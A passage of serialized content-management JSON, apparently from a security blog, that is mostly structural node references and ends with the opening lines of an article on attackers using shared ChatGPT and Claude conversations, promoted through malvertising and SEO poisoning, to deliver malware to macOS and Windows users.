arks":5654,"data":5655},[],{},{"nodeType":1041,"data":5657,"content":5660},{"target":5658},{"sys":5659},{"id":1536,"type":1046,"linkType":1047},[],{"nodeType":721,"data":5662,"content":5663},{},[],{"nodeType":769,"data":5665,"content":5666},{},[5667],{"nodeType":699,"value":1545,"marks":5668,"data":5670},[5669],{"type":707},{},{"nodeType":695,"data":5672,"content":5673},{},[5674],{"nodeType":699,"value":1553,"marks":5675,"data":5676},[],{},{"nodeType":1041,"data":5678,"content":5681},{"target":5679},{"sys":5680},{"id":1560,"type":1046,"linkType":1047},[],{"nodeType":695,"data":5683,"content":5684},{},[5685,5688,5694],{"nodeType":699,"value":1566,"marks":5686,"data":5687},[],{},{"nodeType":791,"data":5689,"content":5690},{"uri":1571},[5691],{"nodeType":699,"value":1574,"marks":5692,"data":5693},[],{},{"nodeType":699,"value":1578,"marks":5695,"data":5696},[],{},{"nodeType":695,"data":5698,"content":5699},{},[5700],{"nodeType":699,"value":1585,"marks":5701,"data":5702},[],{},{"nodeType":1589,"data":5704,"content":5705},{},[5706,5719,5732],{"nodeType":1593,"data":5707,"content":5708},{},[5709],{"nodeType":695,"data":5710,"content":5711},{},[5712,5716],{"nodeType":699,"value":1600,"marks":5713,"data":5715},[5714],{"type":707},{},{"nodeType":699,"value":1605,"marks":5717,"data":5718},[],{},{"nodeType":1593,"data":5720,"content":5721},{},[5722],{"nodeType":695,"data":5723,"content":5724},{},[5725,5729],{"nodeType":699,"value":1615,"marks":5726,"data":5728},[5727],{"type":707},{},{"nodeType":699,"value":1620,"marks":5730,"data":5731},[],{},{"nodeType":1593,"data":5733,"content":5734},{},[5735],{"nodeType":695,"data":5736,"content":5737},{},[5738,5742],{"nodeType":699,"value":1630,"marks":5739,"data":5741},[5740],{"type":707},{},{"nodeType":699,"value":1635,"marks":5743,"data":5744},[],{},{"nodeType":695,"data":5746,"content":5747},{},[5748,5751,5757,5760,5764,5767,5773],{"nodeType":699,"value":1642,"marks":5749,"data":5750},[],{},{"nodeType":791,"data":5752,"content":5753},{"uri":1647},[5754],{"nodeType":699,"value":1650,"marks":5755,"data":5756},[],{},{"nodeType":699,"value":1654,"marks":5758,"data":5759},[],{},{"nodeType":699,"value":1658,"marks":5761,"data":5763},[5762],{"type":707},{},{"nodeType":699,"value":1663,"marks":5765,"data":5766},[],{},{"nodeType":791,"data":5768,"content":5769},{"uri":1491},[5770],{"nodeType":699,"value":1494,"marks":5771,"data":5772},[],{},{"nodeType":699,"value":1673,"marks":5774,"data":5775},[],{},{"nodeType":695,"data":5777,"content":5778},{},[5779],{"nodeType":699,"value":1680,"marks":5780,"data":5781},[],{},{"nodeType":1041,"data":5783,"content":5786},{"target":5784},{"sys":5785},{"id":1687,"type":1046,"linkType":1047},[],{"nodeType":721,"data":5788,"content":5789},{},[],{"nodeType":769,"data":5791,"content":5792},{},[5793],{"nodeType":699,"value":1696,"marks":5794,"data":5796},[5795],{"type":707},{},{"nodeType":695,"data":5798,"content":5799},{},[5800],{"nodeType":699,"value":1704,"marks":5801,"data":5802},[],{},{"nodeType":695,"data":5804,"content":5805},{},[5806],{"nodeType":699,"value":1711,"marks":5807,"data":5808},[],{},{"nodeType":695,"data":5810,"content":5811},{},[5812,5815,5821,5824,5828],{"nodeType":699,"value":1718,"marks":5813,"data":5814},[],{},{"nodeType":791,"data":5816,"content":5817},{"uri":1491},[5818],{"nodeType":699,"value":1725,"marks":5819,"data":5820},[],{},{"nodeType":699,"value":1654,"marks":5822,"data":5823},[],{},{"nodeType":699,"value":1732,"marks":5825,"data":5827},[5826],{"type":707},{},{"nodeType":699,"value":1737,"marks":5829,"data":5830},[],{},{"nodeType":695,"data":5832,"content":5833},{},[5834,5837,5843],{"nodeType":699,"value":1744,"marks":5835,"data":5836},[],{},{"nodeType":791,"data":5838,"content":5839},{"uri":1749},[5840],{"nodeType":699,"value":1752,"marks":5841,"data":5842},[],{},{"nodeType":699,"value":1756,"marks":5844,"data":5845},[],{},{"nodeType":1041,"data":5847,"content":5850},{"target":5848},{"sys":5849},{"id":1763,"type":1046,"linkType":1047},[],{"nodeType":721,"data":5852,"content":5853},{},[],{"nodeType":725,"data":5855,"content":5856},{},[5857],{"nodeType":699,"value":1772,"marks":5858,"data":5860},[5859],{"type":707},{},{"nodeType":695,"data":5862,"content":5863},{},[5864,5867,5873],{"nodeType":699,"value":1780,"marks":5865,"data":5866},[],{},{"nodeType":791,"data":5868,"content":5869},{"uri":793},[5870],{"nodeType":699,"value":1787,"marks":5871,"data":5872},[],{},{"nodeType":699,"value":1791,"marks":5874,"data":5875},[],{},{"nodeType":695,"data":5877,"content":5878},{},[5879],{"nodeType":699,"value":909,"marks":5880,"data":5881},[],{},{"nodeType":695,"data":5883,"content":5884},{},[5885],{"nodeType":699,"value":916,"marks":5886,"data":5887},[],{},{"nodeType":695,"data":5889,"content":5890},{},[5891,5894,5901],{"nodeType":699,"value":1810,"marks":5892,"data":5893},[],{},{"nodeType":791,"data":5895,"content":5896},{"uri":927},[5897],{"nodeType":699,"value":1817,"marks":5898,"data":5900},[5899],{"type":799},{},{"nodeType":699,"value":1407,"marks":5902,"data":5903},[],{},{"items":5905},[5906,5908],{"sys":5907,"name":1833},{"id":1832},{"sys":5909,"name":1837},{"id":1836},{"items":5911},[5912],{"fullName":1841,"firstName":1842,"jobTitle":1843,"profilePicture":5913},{"url":1845},{"__typename":952,"sys":5915,"content":5916,"title":3638,"synopsis":3639,"hashTags":60,"publishedDate":3640,"slug":3641,"tagsCollection":6964,"authorsCollection":6970},{"id":2344},{"json":5917},{"data":5918,"content":5919,"nodeType":691},{},[5920,5926,5929,5936,5960,5967,5972,5996,6083,6116,6123,6165,6189,6194,6197,6204,6210,6217,6232,6274,6279,6285,6300,6305,6311,6316,6322,6327,6333,6338,6345,6378,6402,6417,6441,6448,6472,6496,6520,6527,6533,6548,6590,6614,6621,6636,6669,6672,6679,6685,6691,6706,6711,6717,6811,6844,6851,6866,6872,6875,6882,6888,6927,6933,6936,6942,6948],{"data":5921,"content":5922,"nodeType":695},{},[5923],{"data":5924,"marks":5925,"value":2355,"nodeType":699},{},[],{"data":5927,"content":5928,"nodeType":721},{},[],{"data":5930,"content":5931,"nodeType":725},{},[5932],{"data":5933,"marks":5934,"value":2366,"nodeType":699},{},[5935],{"type":707},{"data":5937,"content":5938,"nodeType":695},{},[5939,5942,5948,5951,5957],{"data":5940,"marks":5941,"value":2373,"nodeType":699},{},[],{"data":5943,"content":5944,"nodeType":791},{"uri":2376},[5945],{"data":5946,"marks":5947,"value":2381,"nodeType":699},{},[],{"data":5949,"marks":5950,"value":2385,"nodeType":699},{},[],{"data":5952,"content":5953,"nodeType":791},{"uri":1030},[5954],{"data":5955,"marks":5956,"value":2392,"nodeType":699},{},[],{"data":5958,"marks":5959,"value":2396,"nodeType":699},{},[],{"data":5961,"content":5962,"nodeType":695},{},[5963],{"data":5964,"marks":5965,"value":2404,"nodeType":699},{},[5966],{"type":707},{"data":5968,"content":5971,"nodeType":1041},{"target":5969},{"sys":5970},{"id":2409,"type":1046,"linkType":1047},[],{"data":5973,"content":5974,"nodeType":695},{},[5975,5978,5984,5987,5993],{"data":5976,"marks":5977,"value":2417,"nodeType":699},{},[],{"data":5979,"content":5980,"nodeType":791},{"uri":2420},[5981],{"data":5982,"marks":5983,"value":2425,"nodeType":699},{},[],{"data":5985,"marks":5986,"value":2429,"nodeType":699},{},[],{"data":5988,"content":5989,"nodeType":791},{"uri":2432},[5990],{"data":5991,"marks":5992,"value":2437,"nodeType":699},{},[],{"data":5994,"marks":5995,"value":2441,"nodeType":699},{},[],{"data":5997,"content":5998,"nodeType":695},{},[5999,6002,6008,6011,6017,6020,6026,6029,6035,6038,6044,6047,6053,6056,6062,6065,6071,6074,6080],{"data":6000,"marks":6001,"value":2448,"nodeType":699},{},[],{"data":6003,"content":6004,"nodeType":791},{"uri":2451},[6005],{"data":6006,"marks":6007,"value":2456,"nodeType":699},{},[],{"data":6009,"marks":6010,"value":2460,"nodeType":699},{},[],{"data":6012,"content":6013,"nodeType":791},{"uri":2463},[6014],{"data":6015,"marks":6016,"value":2468,"nodeType":699},{},[],{"data":6018,"marks":6019,"value":2472,"nodeType":699},{},[],{"data":6021,"content":6022,"nodeType":791},{"uri":2475},[6023],{"data":6024,"marks":6025,"value":2480,"nodeType":699},{},[],{"data":6027,"marks":6028,"value":2484,"nodeType":699},{},[],{"data":6030,"content":6031,"nodeType":791},{"uri":2487},[6032],{"data":6033,"marks":6034,"value":2492,"nodeType":699},{},[],{"data":6036,"marks":6037,"value":2496,"nodeType":699},{},[],{"data":6039,"content":6040,"nodeType":791},{"uri":2499},[6041],{"data":6042,"marks":6043,"value":2504,"nodeType":699},{},[],{"data":6045,"marks":6046,"value":2508,"nodeType":699},{},[],{"data":6048,"content":6049,"nodeType":791},{"uri":2511},[6050],{"data":6051,"marks":6052,"value":2516,"nodeType":699},{},[],{"data":6054,"marks":6055,"value":2520,"nodeType":699},{},[],{"data":6057,"content":6058,"nodeType":791},{"uri":2523},[6059],{"data":6060,"marks":6061,"value":2528,"nodeType":699},{},[],{"data":6063,"marks":6064,"value":2532,"nodeType":699},{},[],{"data":6066,"content":6067,"nodeType":791},{"uri":2535},[6068],{"data":6069,"marks":6070,"value":2540,"nodeType":699},{},[],{"data":6072,"marks":6073,"value":2544,"nodeType":699},{},[],{"data":6075,"content":6076,"nodeType":791},{"uri":2547},[6077],{"data":6078,"marks":6079,"value":2552,"nodeType":699},{},[],{"data":6081,"marks":6082,"value":2556,"nodeType":699},{},[],{"data":6084,"content":6085,"nodeType":695},{},[6086,6089,6095,6098,6104,6107,6113],{"data":6087,"marks":6088,"value":2563,"nodeType":699},{},[],{"data":6090,"content":6091,"nodeType":791},{"uri":1355},[6092],{"data":6093,"marks":6094,"value":2570,"nodeType":699},{},[],{"data":6096,"marks":6097,"value":2574,"nodeType":699},{},[],{"data":6099,"content":6100,"nodeType":791},{"uri":2577},[6101],{"data":6102,"marks":6103,"value":2582,"nodeType":699},{},[],{"data":6105,"marks":6106,"value":2586,"nodeType":699},{},[],{"data":6108,"content":6109,"nodeType":791},{"uri":2589},[6110],{"data":6111,"marks":6112,"value":2594,"nodeType":699},{},[],{"data":6114,"marks":6115,"value":1407,"nodeType":699},{},[],{"data":6117,"content":6118,"nodeType":769},{},[6119],{"data":6120,"marks":6121,"value":2605,"nodeType":699},{},[6122],{"type":707},{"data":6124,"content":6125,"nodeType":695},{},[6126,6129,6135,6138,6144,6147,6153,6156,6162],{"data":6127,"marks":6128,"value":2612,"nodeType":699},{},[],{"data":6130,"content":6131,"nodeType":791},{"uri":2615},[6132],{"data":6133,"marks":6134,"value":2620,"nodeType":699},{},[],{"data":6136,"marks":6137,"value":2624,"nodeType":699},{},[],{"data":6139,"content":6140,"nodeType":791},{"uri":2627},[6141],{"data":6142,"marks":6143,"value":2632,"nodeType":699},{},[],{"data":6145,"marks":6146,"value":2636,"nodeType":699},{},[],{"data":6148,"content":6149,"nodeType":791},{"uri":2639},[6150],{"data":6151,"marks":6152,"value":2644,"nodeType":699},{},[],{"data":6154,"marks":6155,"value":2648,"nodeType":699},{},[],{"data":6157,"content":6158,"nodeType":791},{"uri":2651},[6159],{"data":6160,"marks":6161,"value":2656,"nodeType":699},{},[],{"data":6163,"marks":6164,"value":2660,"nodeType":699},{},[],{"data":6166,"content":6167,"nodeType":695},{},[6168,6171,6177,6180,6186],{"data":6169,"marks":6170,"value":2667,"nodeType":699},{},[],{"data":6172,"content":6173,"nodeType":791},{"uri":2670},[6174],{"data":6175,"marks":6176,"value":2675,"nodeType":699},{},[],{"data":6178,"marks":6179,"value":2679,"nodeType":699},{},[],{"data":6181,"content":6182,"nodeType":791},{"uri":2682},[6183],{"data":6184,"marks":6185,"value":2687,"nodeType":699},{},[],{"data":6187,"marks":6188,"value":2691,"nodeType":699},{},[],{"data":6190,"content":6193,"nodeType":1041},{"target":6191},{"sys":6192},{"id":2696,"type":1046,"linkType":1047},[],{"data":6195,"content":6196,"nodeType":721},{},[],{"data":6198,"content":6199,"nodeType":725},{},[6200],{"data":6201,"marks":6202,"value":2708,"nodeType":699},{},[6203],{"type":707},{"data":6205,"content":6206,"nodeType":695},{},[6207],{"data":6208,"marks":6209,"value":2715,"nodeType":699},{},[],{"data":6211,"content":6212,"nodeType":769},{},[6213],{"data":6214,"marks":6215,"value":2723,"nodeType":699},{},[6216],{"type":707},{"data":6218,"content":6219,"nodeType":695},{},[6220,6223,6229],{"data":6221,"marks":6222,"value":2730,"nodeType":699},{},[],{"data":6224,"content":6225,"nodeType":791},{"uri":1355},[6226],{"data":6227,"marks":6228,"value":2570,"nodeType":699},{},[],{"data":6230,"marks":6231,"value":2740,"nodeType":699},{},[],{"data":6233,"content":6234,"nodeType":695},{},[6235,6238,6244,6247,6253,6256,6262,6265,6271],{"data":6236,"marks":6237,"value":2747,"nodeType":699},{},[],{"data":6239,"content":6240,"nodeType":791},{"uri":2750},[6241],{"data":6242,"marks":6243,"value":2755,"nodeType":699},{},[],{"data":6245,"marks":6246,"value":2759,"nodeType":699},{},[],{"data":6248,"content":6249,"nodeType":791},{"uri":2762},[6250],{"data":6251,"marks":6252,"value":2767,"nodeType":699},{},[],{"data":6254,"marks":6255,"value":2771,"nodeType":699},{},[],{"data":6257,"content":6258,"nodeType":791},{"uri":2774},[6259],{"data":6260,"marks":6261,"value":2779,"nodeType":699},{},[],{"data":6263,"marks":6264,"value":2783,"nodeType":699},{},[],{"data":6266,"content":6267,"nodeType":791},{"uri":2786},[6268],{"data":6269,"marks":6270,"value":2791,"nodeType":699},{},[],{"data":6272,"marks":6273,"value":2795,"nodeType":699},{},[],{"data":6275,"content":6278,"nodeType":1041},{"target":6276},{"sys":6277},{"id":2800,"type":1046,"linkType":1047},[],{"data":6280,"content":6281,"nodeType":695},{},[6282],{"data":6283,"marks":6284,"value":2808,"nodeType":699},{},[],{"data":6286,"content":6287,"nodeType":695},{},[6288,6291,6297],{"data":6289,"marks":6290,"value":2815,"nodeType":699},{},[],{"data":6292,"content":6293,"nodeType":791},{"uri":2818},[6294],{"data":6295,"marks":6296,"value":2823,"nodeType":699},{},[],{"data":6298,"marks":6299,"value":2827,"nodeType":699},{},[],{"data":6301,"content":6304,"nodeType":1041},{"target":6302},{"sys":6303},{"id":2832,"type":1046,"linkType":1047},[],{"data":6306,"content":6307,"nodeType":695},{},[6308],{"data":6309,"marks":6310,"value":2840,"nodeType":699},{},[],{"data":6312,"content":6315,"nodeType":1041},{"target":6313},{"sys":6314},{"id":2845,"type":1046,"linkType":1047},[],{"data":6317,"content":6318,"nodeType":695},{},[6319],{"data":6320,"marks":6321,"value":2853,"nodeType":699},{},[],{"data":6323,"content":6326,"nodeType":1041},{"target":6324},{"sys":6325},{"id":2858,"type":1046,"linkType":1047},[],{"data":6328,"content":6329,"nodeType":695},{},[6330],{"data":6331,"marks":6332,"value":2866,"nodeType":699},{},[],{"data":6334,"content":6337,"nodeType":1041},{"target":6335},{"sys":6336},{"id":2871,"type":1046,"linkType":1047},[],{"data":6339,"content":6340,"nodeType":769},{},[6341],{"data":6342,"marks":6343,"value":2880,"nodeType":699},{},[6344],{"type":707},{"data":6346,"content":6347,"nodeType":695},{},[6348,6351,6357,6360,6366,6369,6375],{"data":6349,"marks":6350,"value":2887,"nodeType":699},{},[],{"data":6352,"content":6353,"nodeType":791},{"uri":2890},[6354],{"data":6355,"marks":6356,"value":2895,"nodeType":699},{},[],{"data":6358,"marks":6359,"value":2899,"nodeType":699},{},[],{"data":6361,"content":6362,"nodeType":791},{"uri":2902},[6363],{"data":6364,"marks":6365,"value":2907,"nodeType":699},{},[],{"data":6367,"marks":6368,"value":2911,"nodeType":699},{},[],{"data":6370,"content":6371,"nodeType":791},{"uri":2914},[6372],{"data":6373,"marks":6374,"value":2919,"nodeType":699},{},[],{"data":6376,"marks":6377,"value":2923,"nodeType":699},{},[],{"data":6379,"content":6380,"nodeType":695},{},[6381,6384,6390,6393,6399],{"data":6382,"marks":6383,"value":2930,"nodeType":699},{},[],{"data":6385,"content":6386,"nodeType":791},{"uri":2933},[6387],{"data":6388,"marks":6389,"value":2938,"nodeType":699},{},[],{"data":6391,"marks":6392,"value":2942,"nodeType":699},{},[],{"data":6394,"content":6395,"nodeType":791},{"uri":2945},[6396],{"data":6397,"marks":6398,"value":2950,"nodeType":699},{},[],{"data":6400,"marks":6401,"value":2954,"nodeType":699},{},[],{"data":6403,"content":6404,"nodeType":695},{},[6405,6408,6414],{"data":6406,"marks":6407,"value":2961,"nodeType":699},{},[],{"data":6409,"content":6410,"nodeType":791},{"uri":2964},[6411],{"data":6412,"marks":6413,"value":2969,"nodeType":699},{},[],{"data":6415,"marks":6416,"value":2973,"nodeType":699},{},[],{"data":6418,"content":6419,"nodeType":695},{},[6420,6423,6429,6432,6438],{"data":6421,"marks":6422,"value":2980,"nodeType":699},{},[],{"data":6424,"content":6425,"nodeType":791},{"uri":2983},[6426],{"data":6427,"marks":6428,"value":2988,"nodeType":699},{},[],{"data":6430,"marks":6431,"value":2992,"nodeType":699},{},[],{"data":6433,"content":6434,"nodeType":791},{"uri":2995},[6435],{"data":6436,"marks":6437,"value":3000,"nodeType":699},{},[],{"data":6439,"marks":6440,"value":3004,"nodeType":699},{},[],{"data":6442,"content":6443,"nodeType":769},{},[6444],{"data":6445,"marks":6446,"value":3012,"nodeType":699},{},[6447],{"type":707},{"data":6449,"content":6450,"nodeType":695},{},[6451,6454,6460,6463,6469],{"data":6452,"marks":6453,"value":3019,"nodeType":699},{},[],{"data":6455,"content":6456,"nodeType":791},{"uri":3022},[6457],{"data":6458,"marks":6459,"value":3027,"nodeType":699},{},[],{"data":6461,"marks":6462,"value":3031,"nodeType":699},{},[],{"data":6464,"content":6465,"nodeType":791},{"uri":3034},[6466],{"data":6467,"marks":6468,"value":3039,"nodeType":699},{},[],{"data":6470,"marks":6471,"value":3043,"nodeType":699},{},[],{"data":6473,"content":6474,"nodeType":695},{},[6475,6478,6484,6487,6493],{"data":6476,"marks":6477,"value":3050,"nodeType":699},{},[],{"data":6479,"content":6480,"nodeType":791},{"uri":3053},[6481],{"data":6482,"marks":6483,"value":3058,"nodeType":699},{},[],{"data":6485,"marks":6486,"value":3062,"nodeType":699},{},[],{"data":6488,"content":6489,"nodeType":791},{"uri":3065},[6490],{"data":6491,"marks":6492,"value":3070,"nodeType":699},{},[],{"data":6494,"marks":6495,"value":3074,"nodeType":699},{},[],{"data":6497,"content":6498,"nodeType":695},{},[6499,6502,6508,6511,6517],{"data":6500,"marks":6501,"value":3081,"nodeType":699},{},[],{"data":6503,"content":6504,"nodeType":791},{"uri":3084},[6505],{"data":6506,"marks":6507,"value":3089,"nodeType":699},{},[],{"data":6509,"marks":6510,"value":3093,"nodeType":699},{},[],{"data":6512,"content":6513,"nodeType":791},{"uri":3096},[6514],{"data":6515,"marks":6516,"value":3101,"nodeType":699},{},[],{"data":6518,"marks":6519,"value":3105,"nodeType":699},{},[],{"data":6521,"content":6522,"nodeType":769},{},[6523],{"data":6524,"marks":6525,"value":3113,"nodeType":699},{},[6526],{"type":707},{"data":6528,"content":6529,"nodeType":695},{},[6530],{"data":6531,"marks":6532,"value":3120,"nodeType":699},{},[],{"data":6534,"content":6535,"nodeType":695},{},[6536,6539,6545],{"data":6537,"marks":6538,"value":3127,"nodeType":699},{},[],{"data":6540,"content":6541,"nodeType":791},{"uri":3130},[6542],{"data":6543,"marks":6544,"value":3135,"nodeType":699},{},[],{"data":6546,"marks":6547,"value":3139,"nodeType":699},{},[],{"data":6549,"content":6550,"nodeType":695},{},[6551,6554,6560,6563,6569,6572,6578,6581,6587],{"data":6552,"marks":6553,"value":3146,"nodeType":699},{},[],{"data":6555,"content":6556,"nodeType":791},{"uri":3149},[6557],{"data":6558,"marks":6559,"value":3154,"nodeType":699},{},[],{"data":6561,"marks":6562,"value":3158,"nodeType":699},{},[],{"data":6564,"content":6565,"nodeType":791},{"uri":3161},[6566],{"data":6567,"marks":6568,"value":3166,"nodeType":699},{},[],{"data":6570,"marks":6571,"value":3170,"nodeType":699},{},[],{"data":6573,"content":6574,"nodeType":791},{"uri":3173},[6575],{"data":6576,"marks":6577,"value":3178,"nodeType":699},{},[],{"data":6579,"marks":6580,"value":3182,"nodeType":699},{},[],{"data":6582,"content":6583,"nodeType":791},{"uri":3185},[6584],{"data":6585,"marks":6586,"value":3190,"nodeType":699},{},[],{"data":6588,"marks":6589,"value":1407,"nodeType":699},{},[],{"data":6591,"content":6592,"nodeType":695},{},[6593,6596,6602,6605,6611],{"data":6594,"marks":6595,"value":3200,"nodeType":699},{},[],{"data":6597,"content":6598,"nodeType":791},{"uri":3203},[6599],{"data":6600,"marks":6601,"value":3208,"nodeType":699},{},[],{"data":6603,"marks":6604,"value":3212,"nodeType":699},{},[],{"data":6606,"content":6607,"nodeType":791},{"uri":3215},[6608],{"data":6609,"marks":6610,"value":3220,"nodeType":699},{},[],{"data":6612,"marks":6613,"value":3224,"nodeType":699},{},[],{"data":6615,"content":6616,"nodeType":769},{},[6617],{"data":6618,"marks":6619,"value":3232,"nodeType":699},{},[6620],{"type":707},{"data":6622,"content":6623,"nodeType":695},{},[6624,6627,6633],{"data":6625,"marks":6626,"value":3239,"nodeType":699},{},[],{"data":6628,"content":6629,"nodeType":791},{"uri":2577},[6630],{"data":6631,"marks":6632,"value":3246,"nodeType":699},{},[],{"data":6634,"marks":6635,"value":3250,"nodeType":699},{},[],{"data":6637,"content":6638,"nodeType":695},{},[6639,6642,6648,6651,6657,6660,6666],{"data":6640,"marks":6641,"value":3257,"nodeType":699},{},[],{"data":6643,"content":6644,"nodeType":791},{"uri":3260},[6645],{"data":6646,"marks":6647,"value":3265,"nodeType":699},{},[],{"data":6649,"marks":6650,"value":3269,"nodeType":699},{},[],{"data":6652,"content":6653,"nodeType":791},{"uri":3272},[6654],{"data":6655,"marks":6656,"value":3277,"nodeType":699},{},[],{"data":6658,"marks":6659,"value":3281,"nodeType":699},{},[],{"data":6661,"content":6662,"nodeType":791},{"uri":3284},[6663],{"data":6664,"marks":6665,"value":3289,"nodeType":699},{},[],{"data":6667,"marks":6668,"value":3293,"nodeType":699},{},[],{"data":6670,"content":6671,"nodeType":721},{},[],{"data":6673,"content":6674,"nodeType":725},{},[6675],{"data":6676,"marks":6677,"value":3304,"nodeType":699},{},[6678],{"type":707},{"data":6680,"content":6681,"nodeType":695},{},[6682],{"data":6683,"marks":6684,"value":3311,"nodeType":699},{},[],{"data":6686,"content":6687,"nodeType":695},{},[6688],{"data":6689,"marks":6690,"value":3318,"nodeType":699},{},[],{"data":6692,"content":6693,"nodeType":695},{},[6694,6697,6703],{"data":6695,"marks":6696,"value":3325,"nodeType":699},{},[],{"data":6698,"content":6699,"nodeType":791},{"uri":3328},[6700],{"data":6701,"marks":6702,"value":3333,"nodeType":699},{},[],{"data":6704,"marks":6705,"value":21,"nodeType":699},{},[],{"data":6707,"content":6710,"nodeType":1041},{"target":6708},{"sys":6709},{"id":3341,"type":1046,"linkType":1047},[],{"data":6712,"content":6713,"nodeType":695},{},[6714],{"data":6715,"marks":6716,"value":3349,"nodeType":699},{},[],{"data":6718,"content":6719,"nodeType":1589},{},[6720,6738,6756,6775,6793],{"data":6721,"content":6722,"nodeType":1593},{},[6723],{"data":6724,"content":6725,"nodeType":695},{},[6726,6729,6735],{"data":6727,"marks":6728,"value":3362,"nodeType":699},{},[],{"data":6730,"content":6731,"nodeType":791},{"uri":3365},[6732],{"data":6733,"marks":6734,"value":3370,"nodeType":699},{},[],{"data":6736,"marks":6737,"value":3374,"nodeType":699},{},[],{"data":6739,"content":6740,"nodeType":1593},{},[6741],{"data":6742,"content":6743,"nodeType":695},{},[6744,6747,6753],{"data":6745,"marks":6746,"value":3384,"nodeType":699},{},[],{"data":6748,"content":6749,"nodeType":791},{"uri":2774},[6750],{"data":6751,"marks":6752,"value":3391,"nodeType":699},{},[],{"data":6754,"marks":6755,"value":3395,"nodeType":699},{},[],{"data":6757,"content":6758,"nodeType":1593},{},[6759],{"data":6760,"content":6761,"nodeType":695},{},[6762,6765,6772],{"data":6763,"marks":6764,"value":21,"nodeType":699},{},[],{"data":6766,"content":6767,"nodeType":791},{"uri":3407},[6768],{"data":6769,"marks":6770,"value":3413,"nodeType":699},{},[6771],{"type":799},{"data":6773,"marks":6774,"value":3417,"nodeType":699},{},[],{"data":6776,"content":6777,"nodeType":1593},{},[6778],{"data":6779,"content":6780,"nodeType":695},{},[6781,6784,6790],{"data":6782,"marks":6783,"value":3427,"nodeType":699},{},[],{"data":6785,"content":6786,"nodeType":791},{"uri":3430},[6787],{"data":6788,"marks":6789,"value":3435,"nodeType":699},{},[],{"data":6791,"marks":6792,"value":3439,"nodeType":699},{},[],{"data":6794,"content":6795,"nodeType":1593},{},[6796],{"data":6797,"content":6798,"nodeType":695},{},[6799,6802,6808],{"data":6800,"marks":6801,"value":3449,"nodeType":699},{},[],{"data":6803,"content":6804,"nodeType":791},{"uri":3452},[6805],{"data":6806,"marks":6807,"value":3457,"nodeType":699},{},[],{"data":6809,"marks":6810,"value":3461,"nodeType":699},{},[],{"data":6812,"content":6813,"nodeType":695},{},[6814,6817,6823,6826,6832,6835,6841],{"data":6815,"marks":6816,"value":3468,"nodeType":699},{},[],{"data":6818,"content":6819,"nodeType":791},{"uri":3471},[6820],{"data":6821,"marks":6822,"value":3476,"nodeType":699},{},[],{"data":6824,"marks":6825,"value":3480,"nodeType":699},{},[],{"data":6827,"content":6828,"nodeType":791},{"uri":1259},[6829],{"data":6830,"marks":6831,"value":3487,"nodeType":699},{},[],{"data":6833,"marks":6834,"value":3491,"nodeType":699},{},[],{"data":6836,"content":6837,"nodeType":791},{"uri":3494},[6838],{"data":6839,"marks":6840,"value":3499,"nodeType":699},{},[],{"data":6842,"marks":6843,"value":3503,"nodeType":699},{},[],{"data":6845,"content":6846,"nodeType":769},{},[6847],{"data":6848,"marks":6849,"value":3511,"nodeType":699},{},[6850],{"type":707},{"data":6852,"content":6853,"nodeType":695},{},[6854,6857,6863],{"data":6855,"marks":6856,"value":3518,"nodeType":699},{},[],{"data":6858,"content":6859,"nodeType":791},{"uri":3521},[6860],{"data":6861,"marks":6862,"value":3526,"nodeType":699},{},[],{"data":6864,"marks":6865,"value":3530,"nodeType":699},{},[],{"data":6867,"content":6868,"nodeType":695},{},[6869],{"data":6870,"marks":6871,"value":3537,"nodeType":699},{},[],{"data":6873,"content":6874,"nodeType":721},{},[],{"data":6876,"content":6877,"nodeType":725},{},[6878],{"data":6879,"marks":6880,"value":3548,"nodeType":699},{},[6881],{"type":707},{"data":6883,"content":6884,"nodeType":695},{},[6885],{"data":6886,"marks":6887,"value":3555,"nodeType":699},{},[],{"data":6889,"content":6890,"nodeType":1589},{},[6891,6900,6909,6918],{"data":6892,"content":6893,"nodeType":1593},{},[6894],{"data":6895,"content":6896,"nodeType":695},{},[6897],{"data":6898,"marks":6899,"value":3568,"nodeType":699},{},[],{"data":6901,"content":6902,"nodeType":1593},{},[6903],{"data":6904,"content":6905,"nodeType":695},{},[6906],{"data":6907,"marks":6908,"value":3578,"nodeType":699},{},[],{"data":6910,"content":6911,"nodeType":1593},{},[6912],{"data":6913,"content":6914,"nodeType":695},{},[6915],{"data":6916,"marks":6917,"value":3588,"nodeType":699},{},[],{"data":6919,"content":6920,"nodeType":1593},{},[6921],{"data":6922,"content":6923,"nodeType":695},{},[6924],{"data":6925,"marks":6926,"value":3598,"nodeType":699},{},[],{"data":6928,"content":6929,"nodeType":695},{},[6930],{"data":6931,"marks":6932,"value":3605,"nodeType":699},{},[],{"data":6934,"content":6935,"nodeType":721},{},[],{"data":6937,"content":6938,"nodeType":695},{},[6939],{"data":6940,"marks":6941,"value":909,"nodeType":699},{},[],{"data":6943,"content":6944,"nodeType":695},{},[6945],{"data":6946,"marks":6947,"value":916,"nodeType":699},{},[],{"data":6949,"content":6950,"nodeType":695},{},[6951,6954,6961],{"data":6952,"marks":6953,"value":21,"nodeType":699},{},[],{"data":6955,"content":6956,"nodeType":791},{"uri":3629},[6957],{"data":6958,"marks":6959,"value":930,"nodeType":699},{},[6960],{"type":799},{"data":6962,"marks":6963,"value":21,"nodeType":699},{},[],{"items":6965},[6966,6968],{"sys":6967,"name":1833},{"id":1832},{"sys":6969,"name":1837},{"id":1836},{"items":6971},[6972],{"fullName":1841,"firstName":1842,"jobTitle":1843,"profilePicture":6973},{"url":1845},{"__typename":952,"sys":6975,"content":6977,"title":7766,"synopsis":7767,"hashTags":60,"publishedDate":7768,"slug":7769,"tagsCollection":7770,"authorsCollection":7776},{"id":6976},"Gcg7PGuICrlRcqq1QFXxH",{"json":6978},{"data":6979,"content":6980,"nodeType":691},{},[6981,6988,6995,7026,7033,7039,7045,7057,7060,7068,7084,7091,7097,7104,7111,7117,7120,7128,7135,7141,7147,7154,7161,7179,7185,7188,7196,7214,7220,7227,7230,7238,7245,7252,7258,7264,7308,7315,7318,7326,7333,7340,7383,7390,7421,7428,7471,7478,7481,7489,7508,7515,7523,7539,7546,7565,7572,7575,7581,7587,7603,7606,7614,7633,7640,7760],{"data":6982,"content":6983,"nodeType":695},{},[6984],{"data":6985,"marks":6986,"value":6987,"nodeType":699},{},[],"Shared conversations on AI chatbot platforms have become the latest delivery mechanism for malware campaigns targeting macOS and Windows users. Attackers create content on platforms like ChatGPT and Claude that appears to offer installation guidance or service updates, then drive traffic to it via search engine results in the form of malvertising and SEO poisoning.  ",{"data":6989,"content":6990,"nodeType":695},{},[6991],{"data":6992,"marks":6993,"value":6994,"nodeType":699},{},[],"The content lives on chatgpt.com or claude.ai — domains that users and security tools trust implicitly — so the attack bypasses 